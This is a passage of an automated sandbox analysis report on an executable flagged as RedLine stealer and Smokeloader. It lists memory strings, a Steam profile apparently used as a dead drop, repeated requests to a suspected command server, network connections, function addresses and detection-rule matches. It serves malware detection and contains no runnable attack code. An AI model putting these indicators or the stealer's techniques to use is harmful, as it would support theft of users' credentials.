              Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
              Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
              Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
              Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: file.exe, 00000000.00000003.1274773836.000000000072E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
              Source: file.exe, 00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315667210.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/B
              Source: file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
              Source: file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api$
              Source: file.exe, 00000000.00000003.1329889525.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1329634294.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1329734149.0000000000783000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1315667210.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiC
              Source: file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apisy
              Source: file.exe, 00000000.00000003.1274944265.000000000073A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274773836.000000000072E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apix
              Source: file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1362882814.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiyp
              Source: file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
              Source: file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/s
              Source: file.exe, 00000000.00000002.1608203623.000000000072B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/ws
              Source: file.exe, 00000000.00000002.1608460222.0000000000771000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/x
              Source: file.exe, 00000000.00000002.1608203623.0000000000703000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274773836.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
              Source: file.exe, 00000000.00000002.1608203623.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiocal
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274773836.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.00000000006EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: file.exe, 00000000.00000003.1274773836.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.00000000006EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
              Source: file.exe, 00000000.00000003.1274773836.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1608203623.00000000006EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900y
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
              Source: file.exe, 00000000.00000003.1274773836.0000000000703000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
              Source: file.exe, 00000000.00000003.1274773836.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
              Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.1286881258.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1286959057.0000000002E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.1316403047.0000000002F40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: file.exe, 00000000.00000003.1274710884.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.7:49714 version: TLS 1.2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00433860 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,0_2_00433860

              System Summary

              barindex
              Source: 00000000.00000002.1608094313.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 00000000.00000002.1608123380.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007893AC0_3_007893AC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007893AC0_3_007893AC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007893AC0_3_007893AC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007893AC0_3_007893AC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007893AC0_3_007893AC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0077215A0_3_0077215A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040D0720_2_0040D072
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004278A00_2_004278A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004249500_2_00424950
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004401500_2_00440150
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043F1300_2_0043F130
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042D1A40_2_0042D1A4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041A2730_2_0041A273
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043D29C0_2_0043D29C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043AB600_2_0043AB60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043D3F30_2_0043D3F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042CB9F0_2_0042CB9F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00422BA00_2_00422BA0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040AC400_2_0040AC40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409C1E0_2_00409C1E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043D57C0_2_0043D57C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004275C00_2_004275C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043CDC80_2_0043CDC8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00437DD00_2_00437DD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043F6400_2_0043F640
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043CF410_2_0043CF41
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B71C0_2_0040B71C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E7E40_2_0040E7E4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004087A00_2_004087A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417FB00_2_00417FB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004168660_2_00416866
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041C8300_2_0041C830
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043B0300_2_0043B030
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004250D00_2_004250D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004240880_2_00424088
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041F0A00_2_0041F0A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004329400_2_00432940
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043594A0_2_0043594A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004059500_2_00405950
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043F9600_2_0043F960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043D1110_2_0043D111
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004389100_2_00438910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043911E0_2_0043911E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043092C0_2_0043092C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004369F30_2_004369F3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004061B00_2_004061B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418ED10_2_00418ED1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00415A620_2_00415A62
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041EA660_2_0041EA66
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00428A180_2_00428A18
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004222300_2_00422230
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042A2C00_2_0042A2C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043C28F0_2_0043C28F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041FA900_2_0041FA90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DA910_2_0040DA91
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041B2950_2_0041B295
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004092B00_2_004092B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043E3400_2_0043E340
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004263590_2_00426359
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043B3700_2_0043B370
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004373000_2_00437300
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043F3100_2_0043F310
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004253C00_2_004253C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00432BC00_2_00432BC0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043BBD00_2_0043BBD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0043E3F00_2_0043E3F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402B800_2_00402B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041F3900_2_0041F390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426B900_2_00426B90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004293A40_2_004293A4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404C400_2_00404C40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004074200_2_00407420
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00430C200_2_00430C20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041248A0_2_0041248A
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 004156E0 appears 50 times
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 1856
              Source: file.exe, 00000000.00000000.1238180709.0000000000450000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesDefenca2 vs file.exe
              Source: file.exe, 00000000.00000003.1245629081.0000000000725000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesDefenca2 vs file.exe
              Source: file.exeBinary or memory string: OriginalFilenamesDefenca2 vs file.exe
              Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.1608094313.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
